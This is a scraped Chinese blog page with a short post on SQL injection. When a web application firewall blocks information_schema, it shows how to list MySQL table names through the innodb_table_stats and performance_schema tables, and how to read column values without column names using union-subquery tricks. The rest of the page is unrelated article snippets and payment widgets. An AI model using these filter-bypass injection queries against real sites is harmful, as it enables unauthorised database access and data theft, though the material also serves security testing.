jdbc获取mysql第二行表信息_【奇技淫巧】MySQL另类方法获取元数据信息

最新推荐文章于 2021-07-11 22:29:25 发布
最新推荐文章于 2021-07-11 22:29:25 发布
阅读量80 收藏
点赞数
文章标签: jdbc获取mysql第二行表信息 mysql group by mysql一次性获取几十万数据

8dc0be554b2ee3bfddedc75dbc64493d.gif

问:在进行MySQL注入时,我们通常是通过information_schema元数据来获取表名、字段名信息,从而读取相应数据。但是如果waf或其它过滤了information_schema关键字,那么还有什么方法可以读取元数据信息呢?答:从MySQL5.5开始,默认存储引擎称为InnoDB,但是在MySQL5.6及更高版本中,InnoDB创建了2个新表。innodb_index_stats和innodb_table_stats。这两个表都包含所有新创建数据库名及表名。

select * from mysql.innodb_table_stats;

062bcae5e5db239f6fbe0685d91943ba.png

select * from mysql.innodb_index_stats;

6b093a41be50e3b8b633906e07f3933a.png

select table_name from mysql.innodb_table_stats where database_name=schema();

e31894f0f6cdbb8903d344b339d2aa09.png

performance_schema方法:

SELECT object_name FROM `performance_schema`.`objects_summary_global_by_type` WHERE object_schema = DATABASE();

893f4ee4b9584e46018e43352721502c.png

表名知道了,那如何提取列名呢?根本不需要探测字段个数,当然你也可以用order by, group_by:

select (select*from users limit 1)=(select 1);
select (select*from users limit 1)=(select 1, 2);

提取指定字段值:

select(select a from(select 1 as a, 1 as b union select*from cms.src_user)x limit 1,1);
select(select b from(select 1 as a, 1 as b union select*from cms.src_user)x limit 1,1);

73ae4263d4e37c913215492adfa49ebe.png

发表于国外最近某篇文章,觉得不错,实验了下发出来。

643b558e1b5553f75b7c523e9cfbf4bf.png

weixin_39788131
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
大幅优化MySQL查询性能的奇技淫巧
09-10
二是多操作,主要涉及到trx_sys和lock_sys(主要是InnoDB)。单查询可能会因为MDL锁导致性能瓶颈,而多查询则可能受限于InnoDB内部结构,特别是不同之间的MDL锁保护。在特定的工作负载下,比如Sysbench OLTP...
一千行 mysql 学习笔记.docx
03-19
MySQL是世界上最受欢迎的关系型数据库管理系统之一,用于存储和管理数据。在进行MySQL的学习时,了解其基本操作和优化策略至关重要。以下是一些关键知识点的详细解释: 1. **查询优化**: - 避免使用`SELECT *`:...
bos 获取数据库连接_JDBC入门(三) —— 获取元数据
weixin_42318812的博客
12-26 176
一、数据元数据 JDBC获取数据元数据的相关API:DatabaseMetaData conn.getMetaData() —— 获取一个 DatabaseMetaData 对象,该对象包含关于此 Connection 对象所连接的数据库的元数据。String getDatabaseProductName() —— 获取数据库产品的名称String getDat...
mysql元数据名大小写
火焰
07-11 498
环境: centos8.1 + mysql 8.0.17 window 10 + mysql 5.7.26 DBeaver 21.1.2.202107041908 一、Mysql的配置项: lower_case_table_names 这个配置项决定着你创建的名存储到Mysql中是都转成小写还是保留原格式,并且还影响sql语句中是否能引用到,它有三个取值如下(假如你的定义语句为:create table `T_Person`(Id int,Name varchar(50));): 0:你创建的
如何动态读取数据库中某一的字段信息
我不当菜鸟
04-17 277
如何动态读取MYSQL的字段信息,或是本身的信息 使用Hibernate3如何读,spring封闭的对hibernate操作的类,又该如何操作。基本思路是怎么的?   网上给的建议是:     Connection connection = getConnection();      // Create a result set      Statement stmt = conne...
元数据MySQL中比较重要的几个
AaronLwx的博客
04-19 385
mysql> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | ruoze_d6 | | sys ...
mysql 元数据_MySQL 元数据查询
weixin_39687621的博客
02-27 207
备注:测试数据库版本为MySQL 8.01.查看某个数据库下的名select table_namefrom information_schema.tableswhere table_schema = 'ZQS';测试记录mysql> select table_name-> from information_schema.tables-> where table_schema =...
JS将网址url转化为JSON格式的方法
01-19
网上方法很多,各种奇技淫巧,这里贴上一种较为正常的思路。 主要利用split对获取的字符串不断进行分割,最后获得所需要的格式。 代码如下 <!DOCTYPE html> <html lang=en> <head> <meta ...
奇技淫巧】这可能是最简单的主程序取插件信息-易语言
06-11
在DLL的"处理"部分,开发者通常会定义一些接口函数或类方法,这些函数暴露给主程序,使得主程序能够获取或操作插件的数据和功能。 主程序的"处理"则涉及如何加载和调用DLL中的接口。在易语言中,我们可以使用"动态...
如何获取数据源下所有的信息下所有的字段信息
github_34793283的博客
02-26 1690
TOC 数据源之DataSource遇见MetaData 最近有个需求,需要获取一个库下所有的或者根据条件模糊匹配,同时还需要获取某张下所有的字段信息,于是乎研究了数据源DataSource对象,发现了一些小秘密,在这里给大家分享一下,如有不对的地方欢迎评论指正或者关于DataSource的其他小秘密也欢迎在评论区留言,如在开发中有用的我将同步采纳并更新博客,谢谢! 环境准备 maven依赖如下: <dependencies> <dependency>
DDL操作数据
weixin_45701447的博客
09-09 791
一.什么是 sql sructured Query Language:结构化查询语言 定义了操作所有 关系型数据库的规则 。每一种数据库操作的方式存在不一样的地方称为方言. 二.sql 通用的语法 1.sql可以单行书写 也可以多行书写 以 分号 结尾 2.mysql 不区分大小写但是关键字 建议大写 三.sql分类 1.DDL:操作数据库和 (1)操作数据库:CRUD C:创建 创建数据库 create database 数据库名称; create database if not exists 数据库名
2020-12-02
qq_34136190的博客
12-02 390
原文:https://blog.csdn.net/xlxxcc/article/details/51754524 MySQL5.7 默认的模式有:information_schema, 具有 61个; m ysqL, 具有31个; performance_schema,具有87个; sys, 具有1个, 100个视图. Information_schema数据库是MySQL自带的,它提供了访问数据元数据的方式。什么是元数据呢?元数据是关于数据...
Java中DatabaseMetaData 元数据信息
sz_bdqn的专栏
04-03 1万+
获取数据库的相关信息: 1.获得数据库的一些相关信息 2.获得该用户下面的所有 3.获得该用户下面的所有视图 4.获得数据库中所有方案名称   5.获得或视图中的所有列信息 6. 获得一个的索引信息 7.获得一个的主键信息 8.获得一个的外键信息 package com.zsw.test; import java.sql.Connection; import
MySQL的字段信息查询--information_schema.COLUMNS
热门推荐
lkforce
03-14 2万+
MySQL的information_schema库中有个COLUMNS,里面记录了mysql所有库中所有的字段信息,该信息如下: COLUMNS的每一条记录都对应了数据库中某个的某个字段,该记录了如下信息:TABLE_CATALOGMySQL官方文档中说,这个字段值永远是def,但没写这个字段是干嘛用的。网上有把这个叫限定符的,有叫登记目录的。作用疑似是和其他种类的数据库做区分。TA...
python 提取固定列名数据_python获取数据库列名
weixin_39806288的博客
12-01 6088
{"moduleinfo":{"card_count":[{"count_phone":1,"count":1}],"search_count":[{"count_phone":4,"count":4}]},"card":[{"des":"阿里云数据库专家保驾护航,为用户的数据库应用系统进行性能和风险评估,参与配合进行数据压测演练,提供数据库优化方面专业建议,在业务高峰期与用户共同保障数据库系统平...
java获取mysql元数据,JDBC获取元数据
weixin_39611722的博客
03-16 240
JDBC获取元数据DatabaseMetaData描述数据库的元数据,可以得到数据库本身的一些信息DatabaseMetaData metaData = connection.getMetaData();// 获取数据库产品的名称String name = metaData.getDatabaseProductName();// jdbc驱动的主版本号int majorVersion = meta...
Mysql中取排名第二的数据方法和limit的用法
Lucas_up的博客
01-26 1万+
limit的用法 我们知道在Mysql里面取最大的数据可以用order by 然后limit 1 取得。那怎么取第二条数据呢。 +----+--------+ | Id | Salary | +----+--------+ | 1 | 100 | | 2 | 200 | | 3 | 300 |   来看怎么取排名第二的数据 方法1,先取得最大的,然后not in...
"Linux实用技术与最佳实践第六版:精华中的精华,奇技淫巧,左道旁门
第二章介绍了Linux网络相关的技术和实践。其中包括如何在Linux系统中使用iperf3工具测试网络吞吐量,微软将Linux XDP项目引入Windows,以及如何使用开源工具创建私有的虚拟专用网络等内容。这些内容对于网络管理人员...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值